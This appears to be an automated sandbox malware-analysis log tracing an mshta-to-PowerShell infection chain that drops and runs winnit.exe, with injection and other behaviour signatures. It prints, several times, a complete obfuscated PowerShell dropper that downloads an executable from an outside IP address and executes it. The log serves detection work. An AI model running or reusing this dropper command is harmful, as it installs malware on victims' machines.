Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B14C27 mouse_event, 6_2_00B14C27
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\winnit.exe "C:\Users\user\AppData\Roaming\winnit.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3925.tmp" "c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP" Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\winnit.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jg9zdhrwum5vicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfzmlusxrpb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxtb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagq0njyk9wyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihz2qktsvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihbitunmtnr4ccx1aw50icagicagicagicagicagicagicagicagicagicagicbdcvbpz1riqkossw50uhryicagicagicagicagicagicagicagicagicagicagicbcdfjmbmn1ktsnicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagikhmvuhizkvlruiiicagicagicagicagicagicagicagicagicagicagicatbmftrxnwyunficagicagicagicagicagicagicagicagicagicagicb3c0fns05iccagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjg9zdhrwum5vojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumtk2lzqwmc93aw4uzxhliiwijgvudjpbufbeqvrbxhdpbm5pdc5leguildasmck7u3rbcnqtc0xlrvaomyk7sukgicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2lubml0lmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jg9zdhrwum5vicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfzmlusxrpb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxtb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagq0njyk9wyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihz2qktsvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihbitunmtnr4ccx1aw50icagicagicagicagicagicagicagicagicagicagicbdcvbpz1riqkossw50uhryicagicagicagicagicagicagicagicagicagicagicbcdfjmbmn1ktsnicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagikhmvuhizkvlruiiicagicagicagicagicagicagicagicagicagicagicatbmftrxnwyunficagicagicagicagicagicagicagicagicagicagicb3c0fns05iccagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjg9zdhrwum5vojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumtk2lzqwmc93aw4uzxhliiwijgvudjpbufbeqvrbxhdpbm5pdc5leguildasmck7u3rbcnqtc0xlrvaomyk7sukgicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2lubml0lmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jg9zdhrwum5vicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfzmlusxrpb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxtb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagq0njyk9wyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihz2qktsvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihbitunmtnr4ccx1aw50icagicagicagicagicagicagicagicagicagicagicbdcvbpz1riqkossw50uhryicagicagicagicagicagicagicagicagicagicagicbcdfjmbmn1ktsnicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagikhmvuhizkvlruiiicagicagicagicagicagicagicagicagicagicagicatbmftrxnwyunficagicagicagicagicagicagicagicagicagicagicb3c0fns05iccagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjg9zdhrwum5vojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumtk2lzqwmc93aw4uzxhliiwijgvudjpbufbeqvrbxhdpbm5pdc5leguildasmck7u3rbcnqtc0xlrvaomyk7sukgicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2lubml0lmv4zsi='+[char]0x22+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jg9zdhrwum5vicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfzmlusxrpb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxtb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagq0njyk9wyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihz2qktsvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihbitunmtnr4ccx1aw50icagicagicagicagicagicagicagicagicagicagicbdcvbpz1riqkossw50uhryicagicagicagicagicagicagicagicagicagicagicbcdfjmbmn1ktsnicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagikhmvuhizkvlruiiicagicagicagicagicagicagicagicagicagicagicatbmftrxnwyunficagicagicagicagicagicagicagicagicagicagicb3c0fns05iccagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjg9zdhrwum5vojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumtk2lzqwmc93aw4uzxhliiwijgvudjpbufbeqvrbxhdpbm5pdc5leguildasmck7u3rbcnqtc0xlrvaomyk7sukgicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2lubml0lmv4zsi='+[char]0x22+'))')))" Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B07CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 6_2_00B07CAF
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B0874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 6_2_00B0874B
Source: winnit.exe, 00000006.00000002.2186302265.0000000000B64000.00000002.00000001.01000000.0000000C.sdmp, win[1].exe.3.dr, winnit.exe.3.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: winnit.exe Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD862B cpuid 6_2_00AD862B
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
